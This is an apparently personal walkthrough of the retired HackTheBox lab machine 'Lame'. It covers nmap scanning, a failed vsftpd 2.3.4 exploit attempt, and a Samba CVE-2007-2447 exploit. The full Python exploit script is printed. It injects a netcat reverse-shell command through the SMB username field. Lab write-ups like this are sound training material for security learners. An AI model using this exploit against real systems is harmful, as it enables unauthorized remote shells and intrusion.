Lame – HTB Walkthrough


Lame is an Easy rated and retired machine on HackTheBox. As always, we start with nmap, including the -p- switch to enumerate all ports.
sudo nmap -sV -sC -p- 10.10.10.3


We have FTP, SMB, and something I don’t know and going to have to look up. Let’s concentrate on FTP and SMB first.
Try anonymous login on FTP, which we can enter.


Although there doesn’t seem to be anything in here. What about the version? Let’s check vsftpd 2.3.4
There are couple of exploits but I don’t really want to use Metasploit.


I came across this Python exploit. It seems easy enough to get going
https://github.com/ahervias77/vsftpd-2.3.4-exploit
But it didn’t see to work and just hangs. It might be patched?


I can’t really find any other exploits so let’s turn enumerate port 445 a little further and search for vulnerabilities.
sudo nmap --script smb-vuln* -p 139,445 10.10.10.3
This doesn’t really help us. We have the Samba version from our nmap, so let’s use Searchsploit.


Seems to be a few. A quick Google I come across CVE-2007-2447
https://github.com/amriunix/CVE-2007-2447/blob/master/usermap_script.py
We cat the file. Everything seems easy enough and this should return a reverse shell to us via Netcat.
#!/usr/bin/python
# -*- coding: utf-8 -*-
# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
import sys
from smb.SMBConnection import SMBConnection
def exploit(rhost, rport, lhost, lport):
payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
username = "/=`nohup " + payload + "`"
conn = SMBConnection(username, "", "", "")
try:
conn.connect(rhost, int(rport), timeout=1)
except:
print '[+] Payload was sent - check netcat !'
if __name__ == '__main__':
print('[*] CVE-2007-2447 - Samba usermap script')
if len(sys.argv) != 5:
print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
else:
print("[+] Connecting !")
rhost = sys.argv[1]
rport = sys.argv[2]
lhost = sys.argv[3]
lport = sys.argv[4]
exploit(rhost, rport, lhost, lport)


Setup our listener on port 13376 and run the exploit. We are on the box.


From here we can grab the user and root flags.



